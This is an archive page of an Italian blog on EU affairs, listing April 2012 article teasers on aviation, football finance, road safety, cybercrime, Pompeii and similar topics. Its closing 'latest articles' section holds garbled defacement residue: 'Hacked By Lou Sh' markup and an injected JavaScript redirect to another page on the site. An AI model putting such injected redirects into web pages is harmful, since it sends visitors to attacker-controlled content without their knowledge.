EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aprile 2012
it

La Commissione Europea rende noto che è stato raggiunto un accordo sullo sviluppo di un mercato unico nel settore del trasporto aereo. L’approvazione definitiva dell’accordo, alle prese con gli ultimi via libera delle procedure interne alle parti, vedrà l’apertura a collegamenti diretti tra Israele e qualsiasi località dell’Unione Europea.

L’Unione Europea e Israele si avvicinano. Questo è il responso che esce da Tel Aviv dopo l’accordo che lega le due parti e cerca di ristabilire un reciproco rispetto comune sul mercato unico del settore del trasporto aereo, con la prospettiva di arrivare un giorno ad uno spazio aereo (...)

it

Jason Russell, Bobby Bailey e Laren Poole e i fondatori di Invisible Children Inc. hanno realizzato un video che si autodistruggerà il 31 dicembre 2012. Diffuso a partire dallo scorso 5 marzo, il filmano si propone di sconfiggere e catturare Joseph Kony, un guerriero ugandese che da anni si macchia dei peggiori reati che si possano immaginare: rapimento di minori, induzione alla prostituzione o alla carriera militare, stupro, induzione alla criminalità.

Fino a qualche giorno fa Kony era un semplice nome che diceva ben poco ad ognuno di noi. Nessuno, o forse pochi, erano a conoscenza della dura realtà nascosta dietro quattro semplici lettere. Nessuno avrebbe mai immaginato che un solo uomo fosse capace di generare tanto terrore. Chi è Kony? (...)

it

Il presidente della UEFA (Union of European Football Associations) Platini e il vicepresidente dell'esecutivo UE responsabile per la Concorrenza Joaquin Almunia, hanno divulgato un comunicato congiunto che dà il via libera all'attuazione del sistema che dovrebbe eliminare i debiti della maggior parte delle squadre di calcio europee: il fair play finanziario. Platini è in costante lotta con il problema da quando è stato eletto presidente (26 Gennaio 2007). Finalmente gli è stata data via libera per procedere: questo è un passo importante per il calcio europeo che ormai rischia il tracollo a causa dei milioni e milioni di euro di indebitamento contratti dai club in tutti questi anni di spese folli.

Michel Platini Il presidente della UEFA Michel Platini Il presidente della UEFA ci vuole vedere chiaro. I bilanci dei top team europei dovranno essere a posto, nessuno potrà più tenere nascoste le proprie spese, il doping finanziario non dovrà sussistere. Per comprendere a fondo la questione (...)

it

Nel corso del 2011 la riduzione della mortalità stradale ha fatto registrare una diminuzione di appena il 2%: un risultato davvero sottotono rispetto alla media annua di circa il 6%. “È inaccettabile che ancora oggi 85 persone perdano ogni giorno la vita sulle strade europee” è il commento del Commissario europeo per i trasporti Siim Kallas che ha definito “un campanello d’allarme” i dati recentemente pubblicati.

Cresce, ogni giorno di più, la lista di quelle che chiamano “vittime della strada”. Tre parole che racchiudono un mondo intero. Un mondo fatto di vite spezzate e sogni infranti in un attimo. Una banale distrazione o un bicchiere di troppo bastano per entrare di diritto in quel bollettino di guerra (...)

it

Cecilia Malmstrom, Commissaria Ue per gli affari interni, ha affermato che all'iniziativa parteciperanno all'inizio 30 specialisti, che poi diventeranno 55, i quali lavoreranno a tempo pieno per cercare di arginare il preoccupante fenomeno che attanaglia il web: il crimine informatico.

Dati ufficiali riportano una perdita di 388 miliardi di dollari l’anno causata dalla pirateria informatica. Questo non dovrà più ripetersi dal 2013 in poi, anno che prevede la creazione dell’European Cybercrime Centre (EC3), centro operativo con sede in Olanda, dove si sfrutterà la sede (...)

it

Expedia, il sito di viaggi online, scende in campo contro Google e affida alla Commissione UE nuovo materiale per giustificare il richiamo all'antitrust contro il motore di ricerca americano.

Se fosse un film certamente si intitolerebbe “Tutti contro Goolge”. Il colosso di Mountain View non ha mai avuto molti amici né sostenitori, del resto si sa, il potere logora (in questo caso anche chi non ce l’ha). Potere dominante di cui è ormai diverso tempo che il più grande motore di ricerca sta (...)

it

Il Tribunale di Bruxelles ribadisce le decisioni della Commissione europea. Il governo italiano, nel 2008, aveva stanziato un prestito di 300 milioni di euro; Ryanair si era opposta agli aiuti di Stato. Adesso dovrà pagare le spese legali.

La Corte di giustizia dell’Unione europea ha respinto il ricorso presentato da Ryanair e ribadito la sentenza della Commissione europea. I giudici di Lussemburgo hanno dichiarato illegittimo il prestito pari a 300 milioni di euro concesso dal governo italiano ad Alitalia ma hanno al contempo (...)

it

"Ottima notizia dall'Unione europea su Pompei che ha approvato il nostro piano. Ora la fase operativa". Con queste parole, pubblicate su Twitter, il Presidente della Regione Campania, Stefano Caldoro, ha commentato il sostegno garantito dalla Commissione europea. Si tratta di un investimento di 105 milioni di euro utile al restauro degli scavi di Pompei, da tempo meta assiduamente frequentata dai turisti che scelgono come meta la Campania.

“Preservazione, mantenimento e miglioramento”: questo il nome del progetto avviato per il restauro del sito archeologico di Pompei. A seguito dei disastri dovuti alle alluvioni del 2010 e 2011, lo scorso 29 marzo la Commissione europea ha approvato fondi pari a 105 milioni di euro, “combinando (...)

it

L’ASEF, fondazione Asia-Europa, ha deciso di festeggiare il suo 15° anno di vita con l’organizzazione del primo ed unico concorso per cortometraggi: “Short film contest” .

Per chi non ne fosse a conoscenza ASEF (Fondazione Asia-Europa) è, un organizzazione internazionale no profit nata nel 1997 la cui sede amministrativa è a Singapore. Il suo principale obiettivo era, ed è tutt’ora, quello di appianare differenze culturali ed evidenziare aspetti comuni tra le due (...)

it

Secondo la sentenza della Corte europea di giustizia la Commissione non può fissare quantità annue massime per la riduzione delle emissioni di gas serra, come invece avvenuto nel 2007 nei confronti di Polonia e Estonia

Se da un lato alcuni Stati membri tirano un sospiro di sollievo, dall’altro la Commissione incassa un duro colpo, anzi due. Perchè la Corte europea di giustizia oltre a respingere la richiesta da parte della Commissione di annullamento della precedente sentenza del 2009, ha poi stabilito come in (...)

it

Il Comitato delle regioni indice dal 1996 un concorso che ha per tema “Gli enti locali e regionali nell’Unione europea”. Anche quest’anno offre questa possibilità al fine di far conoscere a livello europeo, attraverso lavori che si occupino delle dimensioni locali e regionali dei paesi appartenenti all’Unione europea, diverse realtà.

Nessun altro organo poteva dar vita a un progetto simile, dal momento che il Comitato delle regioni dà, da sempre, voce agli enti locali essendo l’Assemblea dei rappresentanti regionali dell’Unione europea. In particolar modo fa sì che tutte le decisioni prese dalla Commissione europea, dal (...)

it

Le istituzioni europee, di fronte alla pressione esercitata dalle associazioni ambientaliste, sta prendendo atto del mutamento e soprattutto dell’impoverimento delle specie che popolano il Mar Mediterraneo. Così si è optato per una revisione della Politica Comune della Pesca e per una maggiore sensibilità e responsabilità nei confronti della fauna ittica. Curiosamente, a farne le spese c’è anche il Commissario Montalbano!

In un mondo in cui si è sempre più sensibili alla sopravvivenza degli ecosistemi e delle specie faunistiche, al riscaldamento globale e al risparmio energetico, la mancanza di attenzione e di rispetto nei confronti di un ambiente importante sembra stonare ed essere fuori luogo. Il poco interesse (...)

it

Il Premier Monti e alcuni rappresentanti dell'esecutivo a Napoli per illustrare il piano di intervento, frutto della collaborazione tra la Commissione europea e il Governo italiano. Sono stati presentati i primi cinque bandi per un investimento di sei milioni di euro, i successivi scadranno a luglio e dicembre. L'obiettivo è la messa in sicurezza e la rinascita di uno dei siti più importanti al mondo.

Nei giorni scorsi il premier Mario Monti e parte del Governo si sono trasferiti a Napoli per illustrare il progetto che intende restaurare, mettere in sicurezza ed impedire infiltrazioni criminali -mediante il “Protocollo della Legalità”- al sito archeologico di Pompei. L’ideazione, la valutazione (...)

it

Secondo quanto riportato dal quotidiano online EUobserver.com, le domande per lavorare presso la Commissione Europea sono in diminuzione. La causa si può ritrovare nei salari, considerati troppo bassi e poco attraenti. Il rischio di una non equa rappresentanza degli stati si sta facendo avanti prepotentemente.

Sempre meno persone in Europa fanno domanda per un posto di lavoro presso una delle tante aree di competenza della Commissione Europea. Infatti, sono in vertiginosa diminuzione le risposte agli annunci di lavoro da parte di persone interessate e competenti, pubblicati dalla Commissione. Il (...)

it

Numerosi sono stati i commenti positivi rivolti alla nuova riforma del lavoro presentata da Monti e dal Ministro Elsa Fornero. Quest’ultima ha parlato di una modifica equilibrata dell’articolo 18. Fortemente critico resta, invece, l’attacco rivolto dalla Confindustria. Il Presidente Emma Mercegaglia ha fatto riferimento ad “un testo della riforma pessimo”.

"Questa riforma rappresenta un impegno di riforma di rilievo storico per l’Italia. E’ una svolta per il mercato del lavoro che diventerà inclusivo e dinamico". Con queste parole il Premier Mario Monti presenta la nuova riforma del lavoro, partendo proprio dalla questione dell’articolo 18. Cosa (...)

it

Poco più di un mese fa ha destato scalpore la decisione di annullare il referendum per conoscere il pensiero dei sammarinesi a riguardo dell'entrata nell'Ue. Ora, un nuovo accordo è venuto alla luce e prevede almeno quarantacinque normative approvate dall'Ue alle quali San Marino dovrà adempire onde evitare la caduta dei diritti derivanti da tale accordo. Il patto sancisce che l'enclave non aderirà all'Unione ma avrà un percorso che pian piano lo porterà ad integrarsi nell'organismo europeo per eccellenza

Antonella Mularoni, Segretario di Stato per gli Affari Esteri, e Olli Rehn, vice Presidente della Commissione europea e Commissario per gli Affari economici e monetari, hanno siglato a Bruxelles un accordo monetario tra San Marino e l’Unione Europea. Alla fine del 2000 il piccolo Stato (...)

it

Ogni anno oltre 1.000 grandi navi mercantili, petroliere e portacontainer sono avviate al riciclaggio per il recupero dei rottami metallici. Ma non tutte subiscono questa giusta fine. Molte imbarcazioni infatti finiscono su spiagge sabbiose dell’Asia meridionale, luoghi di smaltimento non conformi agli standard. Ad aggravare la situazione nella maggior parte dei casi è l’assenza di misure di tutela ambientale e di sicurezza per la gestione dei materiali pericolosi. La Commissione dunque ha deciso di promuovere nuove norme che regolino e terminino questo fenomeno dannoso.

Nuovo intervento della Commissione Europea a salvaguardia dell’ambiente. Al fine di prevenire ed eliminare il fenomeno dell’inquinamento da amianto, stagno tributile, policlorobifenili (PCB), e da morchie sono state proposte nuove norme per lo smaltimento e il reciclo delle navi. Il sistema (...)

it

Nel corso della riunione tenutasi lo scorso 22 Marzo, il Collegio dei Commissari dell’UE ha deciso di archiviare 11 procedure d'infrazione riguardanti l'Italia (10 relative a procedure già aperte ed una riguardante un reclamo), e di aprirne 10 nuove per mancato recepimento delle direttive dell'Unione . Il numero di procedure d'infrazione a carico dell'Italia scendono quindi a 132 di cui 93 riguardano casi di violazione del diritto dell'Unione e 39 sono relative al mancato recepimento delle direttive.

Ma che cos’è nello specifico una procedura d’infrazione? Come ormai noto, la Commissione Europea ha il ruolo di vigilare costantemente sull’adempimento da parte degli Stati membri dell’Unione Europea di tutti gli obblighi ad essi relativi in virtù dei Trattati. La procedura d’infrazione (...)

it

Come ben sappiamo, l’economia globale, volendo usare un eufemismo, non naviga in acque tranquille. Le istituzioni bancarie sono sotto costante pressione e il rischio di una debacle è sempre dietro l'angolo. Per evitare che la situazione peggiori ulteriormente occorre dare risposte rapide e strategicamente efficienti, figlie di approfondite conoscenze economiche e di una smisurata capacità di rinnovamento e adattamento alle fluttuanti dinamiche del mercato globale. Chi meglio di un ricercatore in campo economico, distintosi eccellentemente durante la propria carriera, può fornire tali risposte?

-Brevi cenni storici: Wim Duisenberg La borsa di studio è intitolata ad una delle figure più importanti nel campo economico-finanziario dal dopoguerra ad oggi. Stiamo parparlando di Willem Frederik Duisenberg, meglio noto come Wim Duisenberg. Nella sua carriere, Mr.Euro, come molti lo (...)

it

Da mesi sui social network circolano immagini allarmanti ed appelli a boicottare i prossimi Europei di calcio al grido di "STOP KILLING DOGS FOR THE UEFA EURO 2012". Cosa succede?

La 14° edizione dei campionati europei di calcio avrà luogo dall’8 giugno al 1 luglio 2012 in Polonia ed in Ucraina, le quali, da tempo hanno messo in campo tutte le forze a loro disposizione per concludere i lavori in tempo e riuscire ad offrire dei servizi adeguati alle masse di sportivi che (...)

it

Nuovo momento di crisi per l’Europa. Questa volta ad essere interessato è il mercato delle auto e delle immatricolazioni di autovetture. Dopo il calo nel mese di gennaio 2012 (-6,6%), anche nel secondo mese dell’anno i dati non sono per nulla incoraggianti. La Commissione sta varando nuove proposte per ridurre le difficoltà burocratiche e favorire un mercato ancora più libero.

L’associazione europea dei costruttori automobilistici (ACEA), ha lanciato il suo allarme e ha diffuso i dati preoccupanti relativi al comparto automobilistico e delle immatricolazioni in Europa. Il settore ha fatto registrare un vertiginoso calo del 9,2% nel solo mese di febbraio, con una (...)

it

L’inquinamento acustico rappresenta un danno potenziale alla salute di un europeo su due. Stando ai dati della ricerca promosso dal ministero dell’Ambiente olandese, gli eccessivi rumori procurerebbero una serie di patologie e disfunzioni cardiovascolari e ai timpani, il tutto a fortificare il peggioramento dei livelli di stress e nervosismo, a cui la società liquida del terzo millennio sembra essersi abituata. Brutte notizie per i cittadini europei, ancor più brutte se si considera che le ripercussioni più gravose cadranno sulle loro tasche, visto che prima produciamo inquinamento, poi dobbiamo combatterlo

Il semaforo diventa verde, via con i clacson. Sfrecciano motorini con marmitte spaziali e parte il valzer delle sirene: ambulanze e forze dell’ordine fanno a gara di chiasso. Nella giungla del traffico cittadino, parafrasando Darwin, solo i più adatti vanno avanti, ecco perché vince chi fa più (...)

it

Il visto precedente era entrato in vigore lo scorso novembre, ma la Commissione ha ritenuto opportuno rivederlo vista la delicatezza della questione. I parametri analizzati dai supervisori della questione sono molteplici, ma i più salienti riguardano ovviamente la sicurezza, in quanto un eventuale crollo di un aereo su suolo europeo potrebbe causare danni inimmaginabili.

La lista stilata a novembre era stata fatta soprattutto in vista delle vacanze natalizie, dove qualche viaggio è sempre auspicabile e probabile. Non era la prima volta che veniva adottata. Infatti, si trattava di una rivisitazione di un elenco precedente. Quella che può essere definita una vera (...)

it

Creatività, passione e una buona dose di tecnologia: sono questi gli ingredienti giusti per aggiudicarsi la vittoria al “Microsoft Imagine Cup 2012”, il concorso internazionale che coinvolge gli studenti di tutto il mondo pronti a sfidarsi, a colpi di talento, per trovare le soluzioni più innovative ai problemi della comunità globale.

Che cos’è “Imagine Cup”? “Imagine Cup” è un concorso promosso e sponsorizzato dal colosso dell’informatica Microsoft Corporation e giunto ormai alla sua decima edizione. Nato nel lontano 2003, con circa 1.000 partecipati provenienti da 25 Paesi e regioni, il concorso sta riscuotendo ogni anno sempre (...)

it

“Consumare di meno per produrre di più”, ecco il motto di “Generation Awake: le tue scelte fanno un mondo di differenza!”, la campagna di sensibilizzazione lanciata nell’Ottobre 2011 dall’Unione Europea per incoraggiare i consumatori a trasformare in un comportamento abitudinario l’utilizzo efficace delle risorse. In tempi di crisi come quelli che stiamo attraversando, consumare in modo razionale e riflettere prima di scegliere possono rappresentare le giuste condizioni per contribuire a conservare le risorse naturali, a risparmiare, a ridurre il nostro impatto sull'ambiente e a garantire un futuro più sostenibile.

Si tratta di una campagna innovativa inaugurata in Polonia dal Commissario europeo per l’Ambiente, Janez Potocnick, e da Andrzej Kraszewski, Ministro polacco dell’Ambiente, la quale si avvale di un videoclip di grande diffusione su Internet, un sito web multilingue dedicato al tema (...)

it

È scontro aperto tra il garante della privacy dell’Unione europea e i social network, primo fra tutti Facebook. Ad essere oggetto del contendere è il meccanismo del tagging, cioè la possibilità di apporre delle etichette (tag) alle immagini per permettere di identificare gli amici. Secondo l’Ue infatti l'uso dei tag, seppure consentito, deve necessariamente essere autorizzato dagli utenti al fine di tutelare la loro privacy.

Cosa sono e a che servono i tag? La Tag-mania > A chiunque usi Facebook o un altro social network sarà capitato, almeno una volt

it

Il mercato europeo ha bisogno di una ulteriore normativa per facilitare il business intracomunitario, favorire il rapporto impresa-consumatore e offrire maggiore tutela e offerta ai consumatori. La Commissione europea si è, quindi, data da fare per incoraggiare il commercio tra gli Stati membri della Comunità Europea con una nuova e concreta proposta.

In Europa, la scelta di un mercato libero e senza vincoli ha comportato enormi vantaggi. L’integrazione del mercato ha, infatti, favorito la riduzione dei costi, come nel caso della telefonia e delle tariffe aeree, ed anche uno spostamento senza eguali di merci e persone. Tuttavia, sono ancora (...)

it

Earth Day e Earth Hour, due eventi a “impatto zero” che coinvolgono già da diversi anni varie nazioni in tutto il mondo con lo scopo di sensibilizzare gli abitanti del nostro pianeta al tema dell’eco sostenibilità

Earth Day e Earth Day Italia: L’Earth Day è un evento che vede partecipare insieme 170 paesi di tutto il mondo che collaborativamente si preoccupano di garantire un futuro sostenibile al pianeta e ai suoi abitanti. Il vero problema a cui tali paesi cercano di trovare rimedio è la mancanza di beni (...)

it

Il Dipartimento di Giustizia statunitense ha dato vita ad un’inchiesta contro la Apple, accusata di aver preso accordi in noti ristoranti di Manhattan con cinque tra i più potenti editori sui prezzi di vendita degli ebook. La vicenda, che sembra aver avuto inizio con la diffusione del primo iPad nel 2010, ha subito un importante risvolto quando tre delle casi editrici sotto accusa hanno deciso di patteggiare con il DoJ.

Durissime le accuse rivolte da Stati Uniti e Unione Europea nei confronti di una delle più note aziende statunitensi, la Apple, considerata responsabile di aver imposto insieme ad altri cinque grandi editori un cartello sui prezzi degli ebook. Le accuse di Usa e Ue Joaquin Almunia "La (...)

it

Freedom Guide, questo il nome della Guida, è il risultato ottenuto grazie alla campagna “Freedom of movement”, condotta dall’EDF (European Disability Forum). Si tratta di uno strumento pensato per realizzare un’Europa priva di ostacoli e barriere che molto spesso limitano la possibilità di movimento di milioni di disabili. Uno degli obiettivi della Freedom Guide è quello di fungere da riferimento per la Commissione Europea per la realizzazione dell’Atto Europeo per l’Accessibilità

L’EDF (Forum Europeo per la Disabilità sulla libertà di movimento) nasce nel 1996. E’ un’organizzazione europea indipendente che si propone come obiettivo quello di rappresentare e salvaguardare gli interessi di 80 milioni di persone con disabilità in Europa. L’EDF lavora a stretto contatto con le (...)

it

Il rapporto è stato approvato in Commissione con 47 voti favorevoli e 2 contrari, a maggio sarà votato dal Parlamento europeo in seduta plenaria. Con questa misura sarà adottata una nuova strategia comune nei Paesi membri dell'Unione; il provvedimento rientra nei compiti della Commissione antimafia nata lo scorso mese.

La Commissione Libertà pubbliche e giustizia del Parlamento europeo ha approvato quasi all’unanimità, con 47 voti favorevoli e 2 contrari, il rapporto sulla sicurezza interna dell’Unione presentato dall’europarlamentare del Partito Democratico Rita Borsellino. L’iter formale dell’organismo (...)

it

Si sa, i tempi cambiano, si evolvono e con essi si sviluppano nuove abilità, competenze, modi di fare ma anche e soprattutto nuove tecnologie. Sono proprio quest’ultime a condizionare sempre di più le nostre vite: se qualche anno fa era per noi normale acquistare un quotidiano dal nostro giornalaio di fiducia, oggi tale abitudine si è convertita in un “click” gratuito che, in pochissimo tempo, ha la capacità di aprire una finestra sul mondo. Da questo punto di vista, la scoperta di Internet può forse essere considerata come la più grande invenzione del XX secolo. Un’invenzione che, soprattutto nel campo dell’informazione, ha condotto ad importanti sviluppi nonché a nuove modalità di fare comunicazione.

Ecco quindi il motivo ispirante che ha portato alla fondazione di questa nuova scuola di giornalismo: “l’Open data Journalism” vuole infatti rendere disponibile, in forma chiara e intellegibile, quei dati di interesse pubblico disponibili offline e online ma che in realtà risultano essere poco (...)

it

È stata nominata Presidente della nuovo organismo contro la criminalità organizzata la parlamentare siciliana Sonia Alfano. Dalle prime dichiarazioni rilasciate, la neopresidente ha avuto modo di enunciare i principali obiettivi che intende perseguire. Non si tratta solo di incentivare la lotta contro i gruppi mafiosi e controllare il loro operato sul territorio europeo, ma dure saranno anche le misure da adottare contro la corruzione e il riciclaggio di denaro.

Sonia Alfano, figlia del giornalista Beppe Alfano, ucciso nel 1993 dalla mafia per le sue inchieste considerate “scomode”, è stata eletta a Strasburgo Presidente della Commissione Antimafia Europea. La Commissione Antimafia Europea Obiettivi della Commissione Antimafia Tre gli scopi che la (...)

it

Washington, questa è la location che ospiterà i Summit giovanili del G8&G20, nonché il Summit G8 dei Leader mondiali. Scoprite con noi i nomi dei ragazzi che hanno superato le selezioni di YAS e che avranno l'onore di rappresentare il nostro Paese in occasione degli Youth Summits 2012.

La Young Ambassadors Society mette in campo l’ufficiale delegazione italiana che prenderà parte ai Summit di Washington, il prossimo giugno. Dario Mazzella, Zana Nanic, Carmine Finelli, Fabrizio Ventriglia, SimoneTinelli, Francesca Carta, Caterina Bologni, Lorenzo Bettini, Giuseppe Tomaselli e (...)

it

Giornata importante quella del 19 aprile scorso per contrastare i maltrattamenti che i randagi continuano a subire in diversi Stati europei e per sensibilizzare le istituzioni affinché adottino precisi provvedimenti per punire i responsabili di tale massacro. L’On.le Motti ha infatti mostrato al Parlamento europeo un video realizzato dalla Onlus Feder F.I.D.A. ((Federazione Italiana Diritti Animali) che raccoglie le immagini di quello che è stato definito “l’olocausto animale in Europa”.

“La grandezza di una nazione ed il suo progresso morale si possono giudicare dal modo in cui essa tratta gli animali” - Mahatma Gandhi Con questa frase si apre il video-shock che il 19 aprile scorso è stato proiettato in Parlamento europeo e che mostra, senza censure, quello che avviene in (...)

it

L'Assemblea Parlamentare del Consiglio d'Europa vuole documentare il comportamento del dirigente elvetico nel periodo precedente all'elezione presidenziale. L'obiettivo del rapporto è accertare se Blatter fosse a conoscenza della corruzione di alcuni membri del massimo organismo calcistico mondiale.

“Il Consiglio d’Europa si occupi dei problemi dell’Europa e non dei problemi del calcio mondiale’’. Con questa dichiarazione ufficiale il Presidente della FIFA (Fédération Internationale de Football Association) Joseph Blatter il 23 aprile scorso ha commentato il rapporto reso pubblico dall’Assemblea (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France